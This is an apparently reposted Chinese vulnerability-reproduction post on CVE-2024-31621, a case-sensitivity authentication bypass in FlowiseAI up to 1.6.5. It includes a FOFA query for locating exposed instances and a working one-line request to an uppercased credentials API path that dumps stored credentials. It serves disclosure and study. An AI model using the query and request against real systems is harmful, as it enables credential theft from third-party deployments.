当前位置:   article > 正文

【漏洞复现】Flowise 身份认证绕过漏洞(CVE-2024-31621)

cve-2024-31621

0x01 产品简介

FlowiseAI是一个强大的开源项目,致力于简化和自动化业务流程,提高工作效率。该项目结合了人工智能与工作流引擎,为用户提供了一种直观、可扩展的方式来设计、执行和监控复杂的工作流程。

0x02 漏洞概述

FlowiseAI存在身份认证绕过漏洞,未授权的攻击者可以通过将路径修改为大写从而绕过检测,从而获取大量敏感信息。

0x03 测绘语句

fofa: body="Flowise"

0x04 漏洞复现

  1. 通过大小绕过身份认证
  2. GET /Api/v1/credentials HTTP/1.1

0x05 影响范围

flowise version <= 1.6.5

0x06 免责声明

  1. 本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
  2. 请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。
  3. 作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/盐析白兔/article/detail/951563
推荐阅读
相关标签
  

闽ICP备14008679号